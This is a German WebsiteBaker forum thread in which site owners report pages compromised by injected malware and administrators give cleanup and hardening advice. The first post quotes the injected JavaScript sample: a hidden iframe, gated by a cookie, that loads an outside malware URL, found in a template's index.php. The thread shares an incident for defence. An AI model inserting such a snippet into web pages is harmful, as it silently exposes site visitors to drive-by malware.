Welcome, Guest. Please login or register.
Did you miss your activation email?
May 26, 2012, 11:25:32 PM

Login with username, password and session length
Search:     Advanced search
Wollen Sie dem WebsiteBaker Team beitreten?
Nähere Informationen finden Sie unter hier und auf unserer neuen Webseite.
155556 Posts in 21715 Topics by 7737 Members
Latest Member: gx-world
* Home Help Search Login Register
Pages: [1]   Go Down
Print
Author Topic: [GELÖST]-Trojanermeldung der Schweizer Registrierungsstelle "Switch"  (Read 583 times)
didge4u

Offline Offline

Posts: 3


« on: November 18, 2011, 08:45:31 AM »

Hallo Alle,
Ich benutze Websitebaker seit einigen Jahren und habe einige Projekte damit umgesetzt. Eigentlich bin ich ganz zufrieden damit.
Jetzt wurde ich von Switch ermahnt, das auf sich auf eine meiner betreuten Seiten (Version 2.7) ein Trojaner, welcher Malware verbreitet, eingenistet hat. Mir wurde mit der Domainlöschung gedroht.

Glücklicherweise waren die Mitarbeiter kulant und liessen mit sich reden. Mir ist schleierhaft wie sich der folgende Code auf der Seite "einnisten" konnte:

Code:
<script language="JavaScript" type="text/javascript">
 if (document.cookie.search("jhgkz=9") == -1) {
 kwoo=document.getElementById('zgynw');if(kwoo==null){document.write('<iframe id=zgynw
 src=hxxp://outreach.ewu.edu/assets/site/ajax.php style=display:none></iframe>');}
 document.cookie = "jhgkz=9;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}
</script>


Ich weiss nicht, ob ihr ähnliche Erfahrungen mit Verbreitung von Malware hattet. Das würde mich interessieren. Ich vermute, dass der Code über eine Lücke im System eingeschleust wurde.

Gruss aus der Schweiz.

Patrick
« Last Edit: December 03, 2011, 08:43:32 PM by didge4u » Logged
kweitzel
Forum administrator
*****
Offline Offline

Posts: 6977


WWW
« Reply #1 on: November 18, 2011, 08:51:20 AM »

Grundsätzlich denke ich Dein Hoster sollte Dir dabei helfen. Davon mal abgesehen, wo findet sich denn dieser Code?

Gruß

Klaus
Logged

WebsiteBaker Org e.V. - for WebsiteBaker

NorHei
Forum administrator
*****
Offline Offline

Posts: 485



WWW
« Reply #2 on: November 18, 2011, 09:15:08 AM »

Bzw., wo befand er sich, ich hoffe er ist nicht mehr da  cheesy
Logged

It is easier to change the specification to fit the program than vice versa.
DarkViper
Development Team
*****
Offline Offline

Posts: 1254


« Reply #3 on: November 18, 2011, 11:09:48 AM »

Wäre schön, wenn Du uns sagen könntest, in welcher Datei der Schadcode eingebaut war.
Des weiteren, die eingestellten Rechte und Besitzverhältnisse auf diese (und auch andere) Dateien.
Weiter ist es wichtig zu wissen, in welchem Modus PHP bei Dir läuft:  apache2modul oder fast/CGI.

Grundsätzlich: Du solltest Deine WB-Version dringendst auf die aktuelle Version upgraden, da die von Dir verwendete Version 2.7 noch jede Menge gravierende Sicherheitsmängel hat.

Zusätzliche Vorbeugemaßnahmen:
  • Den eigenen Rechner gründlichst nach Maleware scannen
  • Danach auf jeden Fall das FTP-Passwort sowie das Passwort für den WB-Admin ändern
  • Den Webspace nach auffällig neuen Dateien(Erstellungs-/Änderungsdatum) durchsuchen und diese Dateien kontrollieren.
Logged

Anleitungen lesen und selber nachdenken ist anstrengend...  Da lass ich doch lieber andere für mich denken...

In 1984:  Nineteen Eighty-Four is a unrealistic utopia!!
In 2012:  Nineteen Eighty-Four is a little piece only of our reality!!
didge4u

Offline Offline

Posts: 3


« Reply #4 on: November 21, 2011, 09:15:01 PM »

Hallo zusammen
Danke schon mal. Ich werde jetzt mal meinen Provider anfragen.
ich werde auf alle Fälle die ganze Installation neu updaten.

@NorHei und kweitzel: Die Webseite habe ich umgehend lahmgelegt. Der Code befand sich auf jeder einzelnen Seite. Leider habe ich in der Datenbank von WB keinen solchen Code gefunden. Vielleicht wird dieser zur Laufzeit generiert und von irgendwo reinkopiert. Mal schauen was der Provider meint.

Gruss ich werde mich wieder melden.

Patrick
Logged
kweitzel
Forum administrator
*****
Offline Offline

Posts: 6977


WWW
« Reply #5 on: November 21, 2011, 09:18:21 PM »

Was meinst Du denn mit "jeder einzelnen Seite"? Schau mal ob der Code in den Dateien namens index.php drin ist, das würde ich erwarten und das ist eine "standart" Vorgehensweise bei sowas Cheesy

Gruß

Klaus
Logged

WebsiteBaker Org e.V. - for WebsiteBaker

didge4u

Offline Offline

Posts: 3


« Reply #6 on: December 03, 2011, 08:46:15 PM »

Hallo zusammen,
Danke kweitzel! afro
Der Code lag tatsächlich in der datei "index.php" des templates.
Einen Screenshot habe ich angehängt.
Grz Patrick
Logged
kweitzel
Forum administrator
*****
Offline Offline

Posts: 6977


WWW
« Reply #7 on: December 03, 2011, 08:51:54 PM »

Dann musst Du ja "nur noch" herausbekommen, wie der da hin gekommen ist ... hast Du alle anderen index Dateien auf Deinem Webspace geprüft? "Normalerweise" findet man solchen code in allen.

Gruß

Klaus
Logged

WebsiteBaker Org e.V. - for WebsiteBaker

Lomex

Offline Offline

Posts: 50



« Reply #8 on: December 21, 2011, 01:22:30 AM »

Hallo liebe User-Gemeinde,

auch mein Webspace wurde von diversen Trojanern heimgesucht. Und das nicht zum erstenmal. Also wer glaubt, mit dem bereinigen der index-Dateien ist das Problem gelöst, ist auf dem Holzweg. Betroffen war zuerst eine 2.7.er Version, später auch 2.8.1. Nur ein Update auf 2.8.2 brachte auch nichts. Im Backend waren diverse .js Dateien verseucht.

Zwei andere Webseiten musste ich ganz neu aufsetzen, hält bis jetzt. (2.8.2)

Das ich die Trojaner selbst eingeschleust habe, bestreite ich jetzt mal. Meine Systeme sind sauber. Wenn man nach  "joomla trojaner"googelt, findet man auch diverse Einträge in anderen Foren.

Bei meinem Hoster all-inkl. läuft standardmäßig php 4.4.9 . Mit dem Befehl "AddHandler php53-cgi .php" in der .htaccess Datei schalte ich auf die höhere version. (ist in der FAQ so beschrieben) Kann das eine Sicherheitslücke sein?

Gruß
Lomex
Logged

Der Kopf ist rund, damit das Denken die Richtung wechseln kann.
kweitzel
Forum administrator
*****
Offline Offline

Posts: 6977


WWW
« Reply #9 on: December 21, 2011, 07:07:35 AM »

Ich glaube eher nicht, dass es mit dem .htaccess Eintrag zu tun hat Wink

Bist Du denn sicher, dass es nur mit Deinem Webspace auf dem Server zu tun hat? Der All-Inkl Support ist in dieser Hinsicht eigentlich sehr auf Zack. Hast Du bei denen mal angefragt?

Wie sieht es denn mit anderen Usern auf der WB Installation oder mit FTP Zugang aus? Was hast Du noch auf dem Webspace laufen?

Forensik ist aus der Ferne unmöglich zu betreiben. Dazu muss man auf die Maschine rauf und dort rumschnüffeln können. Du brauchst die Eigentümerverhältnisse, Zeitstempel, Zugriff aud die Log-Dateien, etc ...

Gruß

Klaus
Logged

WebsiteBaker Org e.V. - for WebsiteBaker

Pages: [1]   Go Up
Print
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.16 | SMF © 2011, Simple Machines Valid XHTML 1.0! Valid CSS!